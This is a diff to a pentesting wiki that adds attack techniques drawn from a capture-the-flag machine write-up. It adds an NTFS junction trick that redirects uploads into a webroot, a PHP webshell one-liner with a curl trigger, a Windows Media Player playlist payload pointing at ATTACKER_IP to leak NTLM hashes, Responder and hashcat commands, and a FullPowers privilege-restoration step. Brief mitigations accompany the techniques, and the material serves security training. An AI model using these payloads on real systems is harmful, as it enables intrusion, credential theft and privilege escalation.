HTB Media — WMP NTLM leak → NTFS junction to webroot RCE → F...

src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md

@@ -220,4 +220,4 @@ Hunting/IOCs
 - [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
 - [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}

src/pentesting-web/file-upload/README.md

@@ -162,6 +162,33 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
 
 Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
 
+### Escaping upload directory via NTFS junctions (Windows)
+
+When uploads are stored under per-user subfolders on Windows (e.g., C:\Windows\Tasks\Uploads\<id>\) and you control creation/deletion of that subfolder, you can replace it with a directory junction pointing to a sensitive location (e.g., the webroot). Subsequent uploads will be written into the target path, enabling code execution if the target interprets server‑side code.
+
+Example flow to redirect uploads into XAMPP webroot:
+
+```cmd
+:: 1) Upload once to learn/confirm your per-user folder name (e.g., md5 of form fields)
+::    Observe it on disk: C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
+
+:: 2) Remove the created folder and create a junction to webroot
+rmdir C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
+cmd /c mklink /J C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882 C:\xampp\htdocs
+
+:: 3) Re-upload your payload; it lands under C:\xampp\htdocs
+::    Minimal PHP webshell for testing
+::    <?php echo shell_exec($_REQUEST['cmd']); ?>
+
+:: 4) Trigger
+curl "http://TARGET/shell.php?cmd=whoami"
+```
+
+Notes
+- mklink /J creates an NTFS directory junction (reparse point). The web server’s account must follow the junction and have write permission in the destination.
+- This redirects arbitrary file writes; if the destination executes scripts (PHP/ASP), this becomes RCE.
+- Defenses: don’t allow writable upload roots to be attacker‑controllable under C:\Windows\Tasks or similar; block junction creation; validate extensions server‑side; store uploads on a separate volume or with deny‑execute ACLs.
+
 ## Tools
 
 - [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
@@ -340,5 +367,7 @@ How to avoid file type detections by uploading a valid JSON file even if not all
 - [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
 - [https://blog.doyensec.com/2025/01/09/cspt-file-upload.html](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
 - [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
+- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
+- [Microsoft – mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink)
 
 {{#include ../../banners/hacktricks-training.md}}

src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md

@@ -4,7 +4,43 @@
 
 **Check all the great ideas from [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) from the download of a microsoft word file online to the ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md and [https://github.com/p0dalirius/windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)**
 
-{{#include ../../banners/hacktricks-training.md}}
+---
+
+## Windows Media Player playlists (.ASX/.WAX)
+
+If you can get a target to open or preview a Windows Media Player playlist you control, you can leak Net‑NTLMv2 by pointing the entry to a UNC path. WMP will attempt to fetch the referenced media over SMB and will authenticate implicitly.
+
+Example payload:
+
+```xml
+<asx version="3.0">
+  <title>Leak</title>
+  <entry>
+    <title></title>
+    <ref href="file://ATTACKER_IP\\share\\track.mp3" />
+  </entry>
+</asx>
+```
+
+Collection and cracking flow:
+
+```bash
+# Capture the authentication
+sudo Responder -I <iface>
+
+# Crack the captured NetNTLMv2
+hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
+```
 
+Notes
+- Works with .asx and .wax. Generate files with ntlm_theft for convenience.
+- Effective when apps/services automatically open uploads for preview (e.g., HR reviewing candidate videos).
+- Mitigations: Disable NTLM/SMB egress, don’t auto-open untrusted media, and harden WMP associations.
 
+## References
+- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
+- [Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft](https://www.morphisec.com/blog/5-ntlm-vulnerabilities-unpatched-privilege-escalation-threats-in-microsoft/)
+- [ntlm_theft – NTLM coercion file generator](https://github.com/Greenwolf/ntlm_theft)
+- [Responder](https://github.com/lgandx/Responder)
 
+{{#include ../../banners/hacktricks-training.md}}

src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md

@@ -37,6 +37,7 @@ whoami /priv | findstr /i impersonate
 
 Operational notes:
 
+- If your shell runs under a restricted token lacking SeImpersonatePrivilege (common for Local Service/Network Service in some contexts), regain the account’s default privileges using FullPowers, then run a Potato. Example: `FullPowers.exe -c "cmd /c whoami /priv" -z`
 - PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). In hardened environments where Spooler is disabled post-PrintNightmare, prefer RoguePotato/GodPotato/DCOMPotato/EfsPotato.
 - RoguePotato requires an OXID resolver reachable on TCP/135. If egress is blocked, use a redirector/port-forwarder (see example below). Older builds needed the -f flag.
 - EfsPotato/SharpEfsPotato abuse MS-EFSR; if one pipe is blocked, try alternative pipes (lsarpc, efsrpc, samr, lsass, netlogon).
@@ -187,5 +188,7 @@ SigmaPotato adds modern niceties like in-memory execution via .NET reflection an
 - [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
 - [https://github.com/tylerdotrar/SigmaPotato](https://github.com/tylerdotrar/SigmaPotato)
 - [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
+- [FullPowers – Restore default token privileges for service accounts](https://github.com/itm4n/FullPowers)
+- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
 
 {{#include ../../banners/hacktricks-training.md}}